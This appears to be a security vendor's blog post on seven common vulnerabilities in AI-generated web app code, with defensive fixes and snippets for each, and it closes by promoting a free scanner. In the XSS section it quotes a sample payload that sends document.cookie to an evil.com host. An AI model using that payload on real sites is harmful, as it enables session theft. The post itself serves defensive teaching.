Tags: AI security · vulnerabilities · Cursor · Lovable · Bolt · v0

The 7 Most Common Vulnerabilities in AI-Generated Code

April 14, 2026 · 11 min read

Multiple studies converge on the same number: somewhere between 45% and 62% of AI-generated code contains security vulnerabilities. A Veracode analysis put it at 45%. The Cloud Security Alliance measured 62%. Georgia Tech's Vibe Security Radar tracked 35 CVEs in a single month attributable to AI coding tools, with researchers estimating the true count is 5-10x higher.

These are not random bugs. The same 7 vulnerability types appear across every AI coding tool we have tested. Here is what they are, why AI produces them, and how to fix each one.

1. Exposed Secrets in Client-Side Code

How often: Found in approximately 40% of Supabase-based apps we scan.

Why AI does this: When you tell Cursor "connect to my database," it uses the fastest path: put the connection credentials in the file that needs them. It does not reason about which files get shipped to the browser. The NEXT_PUBLIC_ prefix in Next.js is an easy trap — AI uses it for every environment variable because it makes the code "work."

Real example: We routinely find Supabase service_role keys, Stripe sk_live_ keys, and OpenAI API keys in client bundles. One app we scanned had all three exposed. The service role key grants full database access, bypassing all RLS policies. The Stripe key allows charging any customer. The OpenAI key can be used to run up thousands of dollars in API costs.

The fix: Audit every environment variable. If it starts with NEXT_PUBLIC_, it is public. Only your Supabase anon key and project URL should be public. Everything else goes server-side. Then rotate every key that was ever in client code — once exposed, assume it has been captured.
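The audit can be automated as a pre-deploy check. A minimal sketch, assuming an allowlist of the two Supabase values that are safe to expose (the function name and allowlist entries are ours, not a Next.js API):

```typescript
// Fail the build if any env var outside an explicit allowlist uses the
// NEXT_PUBLIC_ prefix (Next.js inlines those into the client bundle).
// The allowlist names below are assumptions -- adjust to your project.
const PUBLIC_ALLOWLIST = new Set([
  "NEXT_PUBLIC_SUPABASE_URL",
  "NEXT_PUBLIC_SUPABASE_ANON_KEY",
]);

function findLeakedPublicVars(env: Record<string, string | undefined>): string[] {
  return Object.keys(env).filter(
    (name) => name.startsWith("NEXT_PUBLIC_") && !PUBLIC_ALLOWLIST.has(name)
  );
}
```

Run it against process.env in CI and fail the pipeline if the returned list is non-empty.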

2. Missing or Broken Row Level Security

How often: Found in approximately 60% of Supabase apps. The most common critical vulnerability.

Why AI does this: Supabase ships with RLS disabled by default. AI tools enable it when told to, but the policies they write are often wrong. The three failure patterns: USING(true) policies that pass for every user and every row, UPDATE policies without WITH CHECK that enable privilege escalation, and tables with RLS enabled but zero policies.

Real example: A fintech app we scanned had RLS enabled on its transactions table with a policy: USING(auth.uid() IS NOT NULL). This means any authenticated user can read every transaction in the system — not just their own. The intended policy should have been USING(auth.uid() = user_id).

The fix: For every table, write explicit policies that match rows to the requesting user via auth.uid(). Every UPDATE policy needs WITH CHECK to prevent column tampering. Test by querying as user A and verifying you cannot see user B's data.
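In Postgres policy syntax, the pattern looks like this (table and column names are illustrative):

```sql
-- Explicit per-user policies for a transactions table.
alter table transactions enable row level security;

create policy "read own transactions"
  on transactions for select
  using (auth.uid() = user_id);

create policy "update own transactions"
  on transactions for update
  using (auth.uid() = user_id)
  with check (auth.uid() = user_id);  -- blocks reassigning user_id on update
```

The WITH CHECK clause is what stops a user from updating a row they own and setting user_id to someone else's ID.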

3. Unprotected API Routes

How often: Found in approximately 50% of apps. Especially common in Next.js.

Why AI does this: When you say "create an admin dashboard," AI builds the pages and the API routes. It focuses on making the feature work, not on who can access it. The result: API routes at /api/admin/users or /api/admin/delete that anyone can call without authentication.

Real example: A SaaS app had an /api/admin/export-users endpoint that returned a CSV of all user emails, names, and subscription status. No auth check. No rate limiting. Accessible to anyone who guessed the URL.

The fix: Every API route that returns or modifies data must check authentication in the first 3 lines. In Next.js, create a shared auth helper and call it at the top of every route handler. Better yet, use middleware to protect route groups.
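A minimal sketch of such a helper, framework-agnostic so it runs standalone: the Session shape and lookupSession callback are assumptions, not a Next.js or Supabase API.

```typescript
// Shared auth guard to call at the top of every route handler.
type Session = { userId: string; role: "user" | "admin" };

function requireUser(
  authHeader: string | null,
  lookupSession: (token: string) => Session | null
): Session {
  const token = authHeader?.startsWith("Bearer ")
    ? authHeader.slice("Bearer ".length)
    : null;
  const session = token ? lookupSession(token) : null;
  if (!session) throw new Error("401 Unauthorized");
  return session;
}

function requireAdmin(
  authHeader: string | null,
  lookupSession: (token: string) => Session | null
): Session {
  const session = requireUser(authHeader, lookupSession);
  if (session.role !== "admin") throw new Error("403 Forbidden");
  return session;
}
```

In a real handler you would catch the thrown error and return a 401/403 response; the point is that every admin route starts with one requireAdmin call.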

4. SQL Injection Through Raw Queries

How often: Found in approximately 15% of apps. More common in Python backends and custom API routes.

Why AI does this: AI tools sometimes generate raw SQL queries with string interpolation instead of parameterized queries. This is especially common when the prompt asks for complex queries that the ORM does not handle well, or when the AI reaches for supabase.rpc() with user-supplied parameters.

Real example: A search feature with SELECT * FROM products WHERE name LIKE '%' || $1 || '%' looks safe, but if the RPC function builds the query with string concatenation internally, an attacker can inject arbitrary SQL. We have seen AI generate Supabase RPC functions that concatenate user input directly into SQL strings.

The fix: Always use parameterized queries. In Supabase, use the client library's built-in filtering (.eq(), .like(), etc.) instead of raw SQL. If you must use RPC functions, ensure the function body uses $1, $2 parameters, never string concatenation.
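One subtlety with .like(): the value is parameterized, so injection is prevented, but LIKE wildcards inside user input still act as wildcards. A small helper (the name is ours, not a Supabase API) escapes them so input matches literally:

```typescript
// Escape LIKE metacharacters (%, _, and backslash) so user input is
// matched as literal text inside a pattern.
function escapeLikePattern(input: string): string {
  return input.replace(/[\\%_]/g, (ch) => "\\" + ch);
}

// Usage sketch, assuming a Supabase client named `supabase`:
// supabase.from("products").select().like("name", `%${escapeLikePattern(term)}%`);
```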

5. Cross-Site Scripting (XSS) via dangerouslySetInnerHTML

How often: Found in approximately 25% of React/Next.js apps.

Why AI does this: When you ask AI to display user-generated content (comments, profiles, messages), it often reaches for dangerouslySetInnerHTML because it renders HTML correctly. The name literally warns you, but AI does not read the name — it just knows this function produces the expected output.

Real example: A community app rendered user comments with dangerouslySetInnerHTML={{ __html: comment.body }}. An attacker could submit a comment containing <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script> and steal session cookies from every user who viewed the page.

The fix: Use a sanitization library like DOMPurify before rendering any user content. Or better yet, store content as plain text and render with React's default escaping. Only use dangerouslySetInnerHTML for content you fully control (like CMS-authored blog posts from your own team).
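React's default escaping boils down to entity-encoding the characters HTML treats specially. A sketch of the same idea as a plain function, for the rare case where you must assemble HTML yourself (in production, prefer DOMPurify, which also handles attribute and URL contexts):

```typescript
// Encode the five characters that can break out of an HTML text context.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```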

6. Insecure Direct Object References (IDOR)

How often: Found in approximately 35% of apps. The most underestimated vulnerability.

Why AI does this: AI generates routes like /api/orders/[id] that fetch the order by ID. It does not check whether the requesting user owns that order. If user A knows (or guesses) user B's order ID, they can read the full order details.

Real example: An e-commerce app used sequential integer IDs for orders. Endpoint: /api/orders/1234. No ownership check. An attacker could enumerate every order in the system by incrementing the ID: /api/orders/1235, /api/orders/1236, and so on.

The fix: Two defenses. First, use UUIDs instead of sequential IDs so they cannot be guessed. Second, always verify ownership: WHERE id = $orderId AND user_id = $currentUser. Both defenses together — UUIDs alone are not sufficient because they can still leak through logs or referrer headers.
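The ownership check is one predicate. A sketch with an in-memory array standing in for the database (the Order shape is an assumption; in practice this is the WHERE clause shown above):

```typescript
type Order = { id: string; userId: string; total: number };

// Equivalent of: SELECT ... WHERE id = $orderId AND user_id = $currentUser.
// Returns null both for missing orders and for orders the user does not
// own, so the API response is identical in both cases (no existence leak).
function getOrderForUser(
  orders: Order[],
  orderId: string,
  currentUserId: string
): Order | null {
  return orders.find((o) => o.id === orderId && o.userId === currentUserId) ?? null;
}
```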

7. Missing Rate Limiting on Expensive Operations

How often: Found in approximately 70% of apps. Almost universal.

Why AI does this: Rate limiting is a cross-cutting concern. It does not naturally emerge when you prompt "build me a login page" or "add a search feature." AI builds the feature you asked for. It does not think about what happens when someone calls that feature 10,000 times per second.

Real example: An app with an /api/ai-generate endpoint that called OpenAI's API. No rate limiting, no auth check. An attacker found the endpoint, wrote a script, and ran up $2,300 in API charges in 4 hours before the developer noticed.

The fix: Add rate limiting to every endpoint that is expensive (API calls, database writes, email sending) or sensitive (login, password reset, signup). Upstash Redis with their @upstash/ratelimit package works on Vercel with zero configuration. 5 requests per minute for login. 60 per minute for general API routes. Adjust based on your actual usage patterns.
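To make the mechanism concrete, here is a fixed-window limiter sketched with an in-memory Map. This only works on a single long-lived server; on serverless platforms like Vercel each instance has its own memory, which is exactly why a shared store such as Upstash Redis is needed there.

```typescript
// Fixed-window rate limiter: at most `limit` calls per `windowMs` per key
// (key is typically an IP address or user ID).
class RateLimiter {
  private hits = new Map<string, { count: number; windowStart: number }>();

  constructor(private limit: number, private windowMs: number) {}

  allow(key: string, now: number = Date.now()): boolean {
    const entry = this.hits.get(key);
    if (!entry || now - entry.windowStart >= this.windowMs) {
      this.hits.set(key, { count: 1, windowStart: now });
      return true;
    }
    entry.count += 1;
    return entry.count <= this.limit;
  }
}

// e.g. 5 login attempts per minute per IP:
// const loginLimiter = new RateLimiter(5, 60_000);
```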

Why AI Keeps Making These Mistakes

AI coding tools optimize for one thing: making the code work. Security is a constraint that only matters in adversarial conditions — conditions the AI never experiences during code generation. It has never been hacked. It does not know what it feels like to find your database dumped on Pastebin.

This is not a temporary problem that will be solved by better models. Security requires reasoning about absent things (what checks are missing?), adversarial intent (how would someone misuse this?), and system-level context (how does this endpoint interact with the auth layer?). These are fundamentally different from "make this feature work."

The fix is not to stop using AI coding tools. The fix is to test what they produce.

Frequently Asked Questions

Are some AI coding tools more secure than others?

Marginally. Lovable recently added built-in security scanning (via Aikido). Claude tends to produce more secure code than GPT-4 in our testing, particularly around RLS policies. But none of them are secure by default, and all of them produce code that fails multiple checks on our scanner.

Does using TypeScript help with security?

TypeScript catches type errors, not security vulnerabilities. A perfectly typed function can still have SQL injection, broken auth, and exposed secrets. Type safety is about correctness, not security.

How do I know if my AI-generated code has already been exploited?

Check your Supabase logs for unusual query patterns (many reads from a single IP, access to tables the frontend should not touch). Check your Stripe dashboard for unexpected charges. Check your OpenAI usage for spikes. If you had exposed secrets, assume they were found — rotate them and audit your logs.


Scan your app free

Paste a URL, get a letter grade and Cursor-ready fixes in 3 minutes. No signup required.

Start Free Scan